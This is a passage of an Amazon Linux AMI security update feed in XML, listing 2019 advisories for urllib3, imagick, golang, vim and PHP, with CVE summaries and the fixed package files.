arch="noarch"><filename>Packages/tomcat7-lib-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.94-1.35.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1236</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1236: medium priority package update for python-urllib3</title><issued date="2019-07-17 23:24:00" /><updated date="2019-07-25 18:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11236:
In the urllib3 library through 1.24.1 for Python, CRLF injection is possible if the attacker controls the request parameter.
1700824:
CVE-2019-11236 python-urllib3: CRLF injection due to not encoding the '\r\n' sequence leading to possible attack on internal service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11236" title="" id="CVE-2019-11236" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-urllib3" version="1.24.3" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-urllib3-1.24.3-1.8.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1237</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1237: medium priority package update for php54-pecl-imagick php55-pecl-imagick php56-pecl-imagick php70-pecl-imagick php71-pecl-imagick php72-pecl-imagick</title><issued date="2019-07-17 23:26:00" /><updated date="2019-07-25 18:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11037:
In PHP imagick extension in versions between 3.3.0 and 3.4.4, writing to an array of values in ImagickKernel::fromMatrix() function did not check that the address will be within the allocated array. This could lead to out of bounds write to memory if the function is called with the data controlled by untrusted party.
1708570:
CVE-2019-11037 php-imagick: out-of-bounds write to memory in ImagickKernel::fromMatrix() leading to possible crash and DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11037" title="" id="CVE-2019-11037" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-pecl-imagick" version="3.4.4" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pecl-imagick-3.4.4-1.10.amzn1.x86_64.rpm</filename></package><package name="php54-pecl-imagick-debuginfo" version="3.4.4" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pecl-imagick-debuginfo-3.4.4-1.10.amzn1.x86_64.rpm</filename></package><package name="php54-pecl-imagick-debuginfo" version="3.4.4" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pecl-imagick-debuginfo-3.4.4-1.10.amzn1.i686.rpm</filename></package><package name="php54-pecl-imagick" version="3.4.4" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pecl-imagick-3.4.4-1.10.amzn1.i686.rpm</filename></package><package name="php56-pecl-imagick" version="3.4.4" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pecl-imagick-3.4.4-1.15.amzn1.x86_64.rpm</filename></package><package name="php56-pecl-imagick-debuginfo" version="3.4.4" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pecl-imagick-debuginfo-3.4.4-1.15.amzn1.x86_64.rpm</filename></package><package name="php56-pecl-imagick" version="3.4.4" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pecl-imagick-3.4.4-1.15.amzn1.i686.rpm</filename></package><package name="php56-pecl-imagick-debuginfo" version="3.4.4" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pecl-imagick-debuginfo-3.4.4-1.15.amzn1.i686.rpm</filename></package><package name="php55-pecl-imagick" version="3.4.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pecl-imagick-3.4.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php55-pecl-imagick-debuginfo" version="3.4.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pecl-imagick-debuginfo-3.4.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php55-pecl-imagick" version="3.4.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pecl-imagick-3.4.4-1.14.amzn1.i686.rpm</filename></package><package name="php55-pecl-imagick-debuginfo" version="3.4.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pecl-imagick-debuginfo-3.4.4-1.14.amzn1.i686.rpm</filename></package><package name="php71-pecl-imagick-devel" version="3.4.4" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-imagick-devel-3.4.4-1.7.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-imagick" version="3.4.4" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-imagick-3.4.4-1.7.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-imagick-debuginfo" version="3.4.4" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-imagick-debuginfo-3.4.4-1.7.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-imagick-debuginfo" version="3.4.4" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-imagick-debuginfo-3.4.4-1.7.amzn1.i686.rpm</filename></package><package name="php71-pecl-imagick" version="3.4.4" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-imagick-3.4.4-1.7.amzn1.i686.rpm</filename></package><package name="php71-pecl-imagick-devel" version="3.4.4" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-imagick-devel-3.4.4-1.7.amzn1.i686.rpm</filename></package><package name="php70-pecl-imagick-debuginfo" version="3.4.4" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pecl-imagick-debuginfo-3.4.4-1.6.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-imagick-devel" version="3.4.4" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pecl-imagick-devel-3.4.4-1.6.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-imagick" version="3.4.4" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pecl-imagick-3.4.4-1.6.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-imagick-debuginfo" version="3.4.4" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pecl-imagick-debuginfo-3.4.4-1.6.amzn1.i686.rpm</filename></package><package name="php70-pecl-imagick" version="3.4.4" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pecl-imagick-3.4.4-1.6.amzn1.i686.rpm</filename></package><package name="php70-pecl-imagick-devel" version="3.4.4" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pecl-imagick-devel-3.4.4-1.6.amzn1.i686.rpm</filename></package><package name="php72-pecl-imagick-devel" version="3.4.4" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pecl-imagick-devel-3.4.4-1.9.amzn1.x86_64.rpm</filename></package><package name="php72-pecl-imagick-debuginfo" version="3.4.4" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pecl-imagick-debuginfo-3.4.4-1.9.amzn1.x86_64.rpm</filename></package><package name="php72-pecl-imagick" version="3.4.4" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pecl-imagick-3.4.4-1.9.amzn1.x86_64.rpm</filename></package><package name="php72-pecl-imagick" version="3.4.4" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pecl-imagick-3.4.4-1.9.amzn1.i686.rpm</filename></package><package name="php72-pecl-imagick-debuginfo" version="3.4.4" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pecl-imagick-debuginfo-3.4.4-1.9.amzn1.i686.rpm</filename></package><package name="php72-pecl-imagick-devel" version="3.4.4" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pecl-imagick-devel-3.4.4-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1238</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1238: medium priority package update for golang</title><issued date="2019-07-17 23:28:00" /><updated date="2019-07-25 18:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9741:
An issue was discovered in net/http in Go 1.11.5. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the second argument to http.NewRequest with \r\n followed by an HTTP header or a Redis command.
1688230:
CVE-2019-9741 golang: CRLF injection in net/http
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9741" title="" id="CVE-2019-9741" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-bin" version="1.12.5" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.12.5-1.50.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.12.5" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.12.5-1.50.amzn1.noarch.rpm</filename></package><package name="golang" version="1.12.5" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.12.5-1.50.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.12.5" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.12.5-1.50.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.12.5" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.12.5-1.50.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.12.5" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.12.5-1.50.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.12.5" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.12.5-1.50.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.12.5" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.12.5-1.50.amzn1.i686.rpm</filename></package><package name="golang" version="1.12.5" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.12.5-1.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1239</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1239: important priority package update for vim</title><issued date="2019-07-17 23:30:00" /><updated date="2019-08-26 22:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-12735:
It was found that the `:source!` command was not restricted by the sandbox mode. If modeline was explicitly enabled, opening a specially crafted text file in vim could result in arbitrary command execution.
1718308:
CVE-2019-12735 vim/neovim: ':source!' command allows arbitrary command execution via modelines
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12735" title="" id="CVE-2019-12735" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-debuginfo" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.0.0503-1.46.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.0.0503-1.46.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.0.0503-1.46.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-filesystem-8.0.0503-1.46.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-8.0.0503-1.46.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="i686"><filename>Packages/vim-filesystem-8.0.0503-1.46.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.0.0503-1.46.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.0.0503-1.46.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.0.0503-1.46.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.0.0503-1.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1240</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1240: medium priority package update for php71 php72 php73</title><issued date="2019-07-17 23:33:00" /><updated date="2019-07-25 18:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11040:
When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.
1724154:
CVE-2019-11040 php: information disclosue in function exif_read_data() leads to denial of service
CVE-2019-11039:
Function iconv_mime_decode_headers() in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6 may perform out-of-buffer read due to integer overflow when parsing MIME headers. This may lead to information disclosure or crash.
1724152:
CVE-2019-11039 php: out-of-bounds read due to integer overflow in function iconv_mime_decode_headers()
CVE-2019-11038:
When using gdImageCreateFromXbm() function of PHP gd extension in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6, it is possible to supply data that will cause the function to use the value of uninitialized variable. This may lead to disclosing contents of the stack that has been left there by previous code.
1724149:
CVE-2019-11038 gd: information disclosure in function gdImageCreateFromXbm()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11038" title="" id="CVE-2019-11038" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11039" title="" id="CVE-2019-11039" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11040" title="" id="CVE-2019-11040" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php73-dbg" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.30" release="1.40.amzn1" epoch="0" 